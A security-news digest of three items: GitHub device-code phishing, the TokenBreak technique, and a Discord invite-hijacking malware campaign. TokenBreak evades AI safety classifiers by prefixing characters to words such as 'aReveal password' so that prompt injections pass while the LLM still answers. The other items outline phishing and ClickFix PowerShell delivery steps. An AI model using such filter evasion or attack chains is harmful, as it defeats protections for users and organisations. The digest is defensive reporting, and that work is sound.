GitHub Device Code Flow is the New Backdoor for Phishing Attacks
A new phishing technique quietly targets developers by misusing GitHub’s OAuth 2.0 Device Code Flow, a login method originally intended for smart devices and limited-input systems. Attackers start by requesting a real device code from GitHub’s API with dangerously broad access scopes, including full repository and workflow control. They then send this code and a login URL to a developer, often through phone calls, texts, or emails while pretending to be tech support. Since the code is valid and the login page looks authentic, many developers fall for it and unknowingly complete the login. Once that happens, the attacker receives an OAuth token that grants them long-term access to private repositories, deployment pipelines, and stored secrets. This access isn’t just about stealing code; it opens the door to tampering with software builds, adding malicious dependencies, or quietly exfiltrating data. Some operations have even automated this process with fake GitHub page sites that generate new codes for each victim, making the attack scalable and difficult to trace. The worst part is that there’s no current way to shut off the device code flow feature in GitHub, meaning organizations must build defenses around a door they can’t lock. Security teams are urged to closely monitor GitHub audit logs for events that suggest suspicious OAuth grants, especially those with unusual access scopes or repeated authorization attempts. Watching for spikes in visits to the GitHub device login page can also help identify a phishing campaign in progress. Another defense is restricting GitHub access to a list of trusted IP addresses, though that needs careful handling to avoid breaking CI/CD tools. Organizations should also track user behavior after new tokens are granted; a surge in activity like large repository downloads, secret scans, or workflow changes could signal compromise. Overall, this attack shows how even legitimate login flows can be turned against developers if proper guardrails aren’t in place, and it reinforces the need for stronger user education and automated detection playbooks before attackers do serious damage from inside trusted environments.
TokenBreak Exposes Weak Spots in AI Filters by Exploiting Tokenization Tricks
TokenBreak is a newly exposed exploit that uses subtle word changes to bypass AI text classifiers, targeting how models interpret and break down input. Instead of relying on traditional evasion methods, this technique changes the front of key words by adding harmless characters, like transforming “instructions” into “finstructions” or “Reveal password” into “aReveal password.” These changes confuse the model’s tokenizer without affecting the meaning of the prompt, tricking the AI into processing it normally while the detection system fails to flag it. The core problem lies in how different tokenizers handle these modifications. Byte Pair Encoding (BPE), used by RoBERTa, and WordPiece, used by BERT and DistilBERT, are vulnerable because they merge or split words based on frequency and structure in ways that can be manipulated. Only Unigram tokenizers, like those used in DeBERTa-v2 and v3, were resistant in testing, as they recognize whole words and are less affected by small changes at the front of tokens. The real danger that TokenBreak poses is how easily and automatically these manipulations can be generated. Attackers can write simple scripts to test variations until they find a form that slips past content filters. This allows malicious prompts to bypass classifiers meant to stop prompt injections, hate speech, or confidential data requests while the LLM continues to respond to the intended command. In one test, a model blocked the phrase “Reveal password” but failed to catch “aReveal password,” resulting in a valid LLM response. These results show that security controls relying solely on content classifiers with vulnerable tokenizers are easy to outsmart. To defend against this, experts suggest switching to more robust Unigram-based models or preprocessing input with a Unigram tokenizer before it reaches the main model. Tools like HiddenLayer’s AIDR can also help organizations identify which tokenization methods their models use and where they’re exposed. TokenBreak serves as a reminder that AI security is not just about filtering bad ideas; it starts with how systems read and understand words in the first place.
Expired Discord Invites Turned into Stealthy Delivery System for Multi-Stage Malware
Cybercriminals are now exploiting a flaw in Discord’s custom invite system to take control of expired or recycled links and use them as an entry point for advanced, multi-stage malware attacks. This attack begins when a Discord server with a vanity URL loses its boost, or the invite expires. The vanity code becomes available for reuse, and threat actors register new, malicious servers under the same URL. As a result, anyone clicking on older links posted on forums, social media, or even official sites gets silently redirected to a different, attacker-controlled Discord server. These fake servers are crafted to look legitimate and trustworthy, making it easy to trick users into lowering their guard. Once inside, the campaign deploys a combination of phishing, scripting, and malware staging to infect users with AsyncRAT and a custom version of Skuld Stealer targeting crypto wallets. Check Point researchers, who exposed this campaign in June 2025, have linked the infrastructure to over 1,300 confirmed infections across the U.S., U.K., Vietnam, Germany, and France. The infection chain is a carefully layered process built around a highly effective social engineering technique called “ClickFix.” Users who join the malicious server are prompted by a verification bot named “Safeguard,” created specifically for this campaign. When users click the bot's prompt to verify, they are redirected to an external phishing site, captchaguard[.]me. It mimics Discord’s interface in terms of fonts and layout. The fake page loads a broken CAPTCHA, urging the user to complete a manual verification step. Behind the scenes, malicious JavaScript silently copies a PowerShell command to the user’s clipboard. This command is heavily obfuscated using Base64 encoding and string reversal, masking a URL hosted on Pastebin. When the user is told to open the Run dialog (Win+R) and paste the contents of their clipboard, they unknowingly execute the first stage of malware delivery. The downloaded script launches a chain of payloads that bypass sandbox detection and antivirus tools, ultimately installing full-featured remote access tools and crypto-targeting malware. By routing all payload delivery and data exfiltration through well-known platforms like GitHub, Bitbucket, and Discord’s own CDN, the threat actors ensure their malicious traffic blends in with legitimate network activity. This campaign highlights a technical loophole in Discord’s infrastructure and demonstrates how attackers are weaponizing routine behaviors and trusted platforms to gain control over victims' systems quietly.
